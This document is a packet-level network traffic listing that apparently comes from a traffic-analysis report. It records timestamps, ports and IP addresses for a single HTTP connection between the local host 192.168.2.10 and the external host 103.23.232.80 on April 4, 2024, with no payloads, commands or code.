Apr 4, 2024 17:49:07.966217041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966274023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966291904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966327906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966340065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966347933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966383934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966423988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966443062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966470957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966484070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966504097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966526985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966548920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966557980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966603041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966653109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966666937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966675997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966705084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966711998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966726065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966747999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966782093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966810942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966878891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966897011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966905117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966974020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966980934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966983080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966990948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967005014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967009068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967042923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967138052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967168093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967187881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967221022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967223883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967262030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967288017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967313051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967331886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967340946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967365980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967375040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967403889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967421055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967430115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967487097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967492104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967572927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967581034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967606068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967613935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967626095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967658997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967688084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967695951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967724085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967756033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967778921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967803001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967832088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967832088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967861891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967890024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967910051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.967940092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967957973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.967991114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968017101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968038082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968055964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968089104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968142033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968177080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968190908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968205929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968244076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968255997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968259096 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968266010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968287945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968303919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968322992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968343973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968358994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968384981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968408108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968427896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968437910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968460083 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968466997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968499899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968548059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968559980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968588114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968590021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968605042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968663931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968686104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968704939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968713045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968741894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968750000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968758106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968772888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968796015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968800068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968815088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968858957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968867064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968924046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968925953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.968931913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968945980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.968965054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969013929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969032049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969042063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969094992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969114065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969141006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969162941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969167948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969206095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969214916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969219923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969255924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969264984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969288111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969296932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969322920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969356060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969362020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969393969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969432116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969439983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969448090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969469070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969502926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969533920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969572067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969607115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969641924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969657898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969675064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969707966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969733000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969748020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969788074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969794989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969805002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969819069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969827890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969837904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969882011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.969886065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969944954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.969990969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970005035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970060110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970061064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970068932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970098019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970122099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970125914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970165014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970179081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970199108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970221996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970232964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970268011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970268965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970307112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970333099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970402956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970422983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970439911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970482111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970503092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970510006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970520020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970523119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970561028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970563889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970616102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970623970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970633984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970666885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970671892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970678091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970686913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970710039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970714092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970746994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970762014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.970788956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970940113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970948935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970961094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970968008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970984936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970992088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.970992088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971000910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971026897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971030951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971048117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971071005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971107006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971116066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971138000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971147060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971163988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971165895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971189976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971203089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971221924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971254110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971319914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971328020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971344948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971363068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971376896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971406937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971416950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971446037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971453905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971492052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971503019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971537113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971538067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971560001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971573114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971618891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971651077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971667051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971708059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971752882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971771955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971791983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971832037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971837997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971880913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971910000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971941948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971955061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.971961975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.971999884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972003937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972064018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972071886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972116947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972134113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972142935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972156048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972183943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972187042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972214937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972235918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972301960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972309113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972321987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972330093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972352028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972357035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972393990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972405910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972409010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972429037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972476006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972482920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972489119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972502947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972539902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972557068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972560883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972625971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972634077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972671032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972707033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972714901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972734928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972769022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972773075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972811937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972825050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972831964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972857952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972882032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972899914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972919941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972922087 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972935915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.972970009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.972981930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973002911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973037958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973067045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973090887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973145962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973154068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973191977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973200083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973228931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973248959 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973275900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973305941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973315001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973321915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973330021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973352909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973361969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973401070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973428965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973438025 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973444939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973481894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973495960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973495960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973525047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973526955 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973584890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973592997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973617077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973635912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973675966 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973725080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973772049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973818064 CEST	80	49730	103.23.232.80	192.168.2.10
